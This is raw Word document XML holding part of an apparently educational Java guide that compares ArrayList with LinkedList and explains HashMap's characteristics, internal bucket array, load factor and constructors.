    <w:p w14:paraId="32076D08" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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LinkedList when</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EE9449" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>frequent insertions and deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the beginning or middle of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BBA032" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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don't need frequent index-based access and can afford to traverse the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FD5250" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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need to manage memory dynamically without worrying about resizing or shifting elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414BB116" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E476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0FD573BC" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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st Time Complexity for ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: O(1) for accessing, inserting/removing at the end, and generally better performance for index-based access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC5A581" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E4764">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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st Time Complexity for LinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: O(1) for insertions/removals at the ends, but </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>O(n)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for access and searching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6AEDCC" w14:textId="77777777" w:rsidR="00CD10FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD10FC" w:rsidP="000E476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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>random access performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is critical, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is typically better. If </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>insertions and deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at arbitrary positions are more common, then </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> might be a better choice despite the higher memory usage due to the pointers in each node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F8AA0A" w14:textId="6B15254E"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F2FE29A">
          <v:rect id="_x0000_i1508" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE4C6B6" w14:textId="77777777" w:rsidR="008F441B" w:rsidRPr="00CE4B95" w:rsidRDefault="008F441B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_Toc196307645"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is HashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>
    </w:p>
    <w:p w14:paraId="22A80963" w14:textId="149F7B55" w:rsidR="008F441B" w:rsidRPr="00CE4B95" w:rsidRDefault="00064BBB" w:rsidP="00853748">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HashMap&lt;K, V&gt; is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>part of java.util package</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that implements the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Map interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and allows you to store </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key-value pairs</w:t>
      </w:r>
      <w:r w:rsidR="007B1875" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and allows efficient retrieval, insertion, and deletion operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A207ECD" w14:textId="77777777" w:rsidR="00A92E95" w:rsidRPr="00CE4B95" w:rsidRDefault="00A92E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78976"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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p>
    <w:p w14:paraId="5BAD5A8F" w14:textId="77777777" w:rsidR="00A92E95" w:rsidRPr="00CE4B95" w:rsidRDefault="00A92E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78976"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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lice"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B125C68" w14:textId="05CD4649" w:rsidR="00A92E95" w:rsidRPr="00CE4B95" w:rsidRDefault="00A92E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78976"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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Cit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New York"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F74D803" w14:textId="77777777" w:rsidR="00A92E95" w:rsidRPr="00CE4B95" w:rsidRDefault="00A92E95" w:rsidP="00A92E95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A9FF2F8" w14:textId="77777777" w:rsidR="000664C7" w:rsidRPr="00CE4B95" w:rsidRDefault="000664C7" w:rsidP="000664C7">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Characteristics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3538B9EF" w14:textId="77777777" w:rsidR="000664C7" w:rsidRPr="00CE4B95" w:rsidRDefault="000664C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>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mplements Map Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HashMap implements the java.util.Map interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C41D53F" w14:textId="77777777" w:rsidR="000664C7" w:rsidRPr="00CE4B95" w:rsidRDefault="000664C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>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Key-Value Pairs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Stores data as key-value pairs (like a dictionary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649EC067" w14:textId="77777777" w:rsidR="000664C7" w:rsidRPr="00CE4B95" w:rsidRDefault="000664C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>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Duplicate Keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Doesn't allow duplicate keys (each key maps to exactly one value).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39482C8D" w14:textId="77777777" w:rsidR="000664C7" w:rsidRPr="00CE4B95" w:rsidRDefault="000664C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>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ermits Null Values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows one null key and multiple null values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E1DDBD" w14:textId="77777777" w:rsidR="000664C7" w:rsidRPr="00CE4B95" w:rsidRDefault="000664C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>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t Thread-Safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Not synchronized by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14045E33" w14:textId="77777777" w:rsidR="000664C7" w:rsidRPr="00CE4B95" w:rsidRDefault="000664C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>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nordered Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Doesn't guarantee any specific order of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069E8965" w14:textId="77777777" w:rsidR="000664C7" w:rsidRPr="00CE4B95" w:rsidRDefault="000664C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>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ynamic Resizing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Automatically resizes when the number of elements exceeds a threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D72A8E7" w14:textId="77777777" w:rsidR="000664C7" w:rsidRPr="00CE4B95" w:rsidRDefault="000664C7" w:rsidP="00A92E95">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE8221F" w14:textId="193A6199" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194921" w:rsidP="00194921">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ternal Data Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D720456" w14:textId="77777777" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194921" w:rsidP="00194921">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nally, a HashMap is an array of Node&lt;K,V&gt;, called a bucket array:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55599B5D" w14:textId="6FEC0CA5" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194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4725250"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transien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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>K</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V</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>&gt;[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> table</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1606CB20" w14:textId="77777777" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194921" w:rsidP="00194921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F182A7E" w14:textId="77777777" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194921" w:rsidP="00194921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148D9E38" w14:textId="77777777" w:rsidR="00A42722" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42722" w:rsidP="00A42722">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mportant Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FB8850" w14:textId="77777777" w:rsidR="00A42722" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42722">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>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itial Capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The number of buckets when the HashMap is created (default is 16).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A920DB" w14:textId="77777777" w:rsidR="00A42722" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42722">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>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Load Factor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The measure of how full the hash table is allowed to get before its capacity is increased (default is 0.75).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5E4974" w14:textId="77777777" w:rsidR="00A42722" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42722">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>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shold</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the size exceeds (capacity * load factor), the hash table is rehashed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22349D17" w14:textId="77777777" w:rsidR="00A42722" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42722" w:rsidP="00A42722">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structors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577B4CCD" w14:textId="77777777" w:rsidR="00A42722" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42722">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>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hMap(): Default capacity (16) and load factor (0.75)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303E3F52" w14:textId="77777777" w:rsidR="00A42722" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42722">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>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hMap(int initialCapacity): Specified initial capacity, default load factor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F100760" w14:textId="77777777" w:rsidR="00A42722" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42722">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>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hMap(int initialCapacity, float loadFactor): Both specified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F7DEDF" w14:textId="77777777" w:rsidR="00A42722" w:rsidRPr="00CE4B95" w:rsidRDefault="00A42722">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>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hMap(Map&lt;? extends K, ? extends V&gt; m): Creates from another map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7564DF4E" w14:textId="77777777" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194921" w:rsidP="00194921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3135ED4A" w14:textId="6D23118A" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194921" w:rsidP="00194921">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ach node stores:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC4765" w14:textId="77777777" w:rsidR="00194921" w:rsidRPr="00CE4B95" w:rsidRDefault="00194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3193476"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stat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Node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
